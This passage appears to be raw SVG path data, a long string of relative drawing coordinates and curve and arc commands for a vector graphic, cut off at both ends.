.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1